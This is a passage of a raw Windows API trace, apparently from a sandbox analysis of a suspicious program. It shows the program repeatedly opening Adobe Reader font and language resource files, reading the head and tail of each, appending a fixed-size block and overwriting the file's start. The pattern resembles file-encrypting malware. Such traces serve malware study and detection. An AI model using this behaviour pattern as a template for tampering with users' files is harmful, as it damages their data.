returned 0x37790 [0096.960] WriteFile (in: hFile=0x1d4, lpBuffer=0x288ade8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0096.961] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0096.961] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2fdf28c*=0x8000, lpOverlapped=0x0) returned 1 [0096.961] CloseHandle (hObject=0x1d4) returned 1 [0096.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0096.963] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.963] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8791 [0096.963] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0096.963] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0096.963] ReleaseMutex (hMutex=0x168) returned 1 [0096.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY______.PFB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SY______.PFB", cchWideChar=12, lpMultiByteStr=0x1f735ac, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SY______.PFB", lpUsedDefaultChar=0x0) returned 12 [0096.963] ReadFile (in: hFile=0x1d4, lpBuffer=0x2870988, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2870988*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0096.991] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7791 [0096.991] ReadFile (in: hFile=0x1d4, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0097.070] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7791 [0097.070] WriteFile (in: hFile=0x1d4, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.071] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0097.071] WriteFile (in: hFile=0x1d4, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0097.071] CloseHandle (hObject=0x1d4) returned 1 [0097.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0097.072] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0097.072] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6c96 [0097.072] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0097.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.072] ReleaseMutex (hMutex=0x168) returned 1 [0097.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_IN.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.072] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_IN.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_IN.txt", lpUsedDefaultChar=0x0) returned 30 [0097.072] ReadFile (in: hFile=0x1d4, lpBuffer=0x28719b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28719b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0097.094] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5c96 [0097.094] ReadFile (in: hFile=0x1d4, lpBuffer=0x28719b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28719b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0097.098] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5c96 [0097.099] WriteFile (in: hFile=0x1d4, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.100] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0097.100] WriteFile (in: hFile=0x1d4, lpBuffer=0x28719b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28719b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.100] CloseHandle (hObject=0x1d4) returned 1 [0097.100] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0097.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0097.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6c96 [0097.101] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0097.101] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.101] ReleaseMutex (hMutex=0x168) returned 1 [0097.101] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_QA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0097.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_QA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_QA.txt", lpUsedDefaultChar=0x0) returned 30 [0097.102] ReadFile (in: hFile=0x1d4, lpBuffer=0x28719b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28719b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0097.137] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5c96 [0097.137] ReadFile (in: hFile=0x1d4, lpBuffer=0x28719b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x28719b8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0097.254] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5c96 [0097.254] WriteFile (in: hFile=0x1d4, lpBuffer=0x26956e8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x26956e8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.255] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0097.255] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.255] CloseHandle (hObject=0x1d4) returned 1 [0097.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.380] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.381] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6cdc [0099.381] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.381] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.381] ReleaseMutex (hMutex=0x168) returned 1 [0099.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.381] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ca.txt", lpUsedDefaultChar=0x0) returned 27 [0099.381] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.383] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5cdc [0099.383] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.383] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5cdc [0099.384] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.384] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.384] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.384] CloseHandle (hObject=0x1d8) returned 1 [0099.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.386] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.386] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x7328 [0099.386] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.386] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.386] ReleaseMutex (hMutex=0x168) returned 1 [0099.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_DE.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_DE.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.de_DE.txt", lpUsedDefaultChar=0x0) returned 30 [0099.386] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.388] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6328 [0099.388] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.388] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x6328 [0099.388] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.389] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.389] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.389] CloseHandle (hObject=0x1d8) returned 1 [0099.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.390] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.390] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e88 [0099.390] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.390] ReleaseMutex (hMutex=0x168) returned 1 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_US.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_US.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.en_US.txt", lpUsedDefaultChar=0x0) returned 30 [0099.390] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.392] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e88 [0099.392] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.392] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e88 [0099.393] WriteFile (in: hFile=0x1d8, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.393] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.393] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.393] CloseHandle (hObject=0x1d8) returned 1 [0099.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_DO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_do.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.394] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.394] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6ec8 [0099.394] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.394] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.394] ReleaseMutex (hMutex=0x168) returned 1 [0099.394] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_DO.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_DO.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_DO.txt", lpUsedDefaultChar=0x0) returned 30 [0099.395] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.396] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec8 [0099.396] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.397] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec8 [0099.397] WriteFile (in: hFile=0x1d8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.397] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.397] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.398] CloseHandle (hObject=0x1d8) returned 1 [0099.398] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_PA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_pa.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.398] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.398] SetFilePointer (in: hFile=0x1d8, 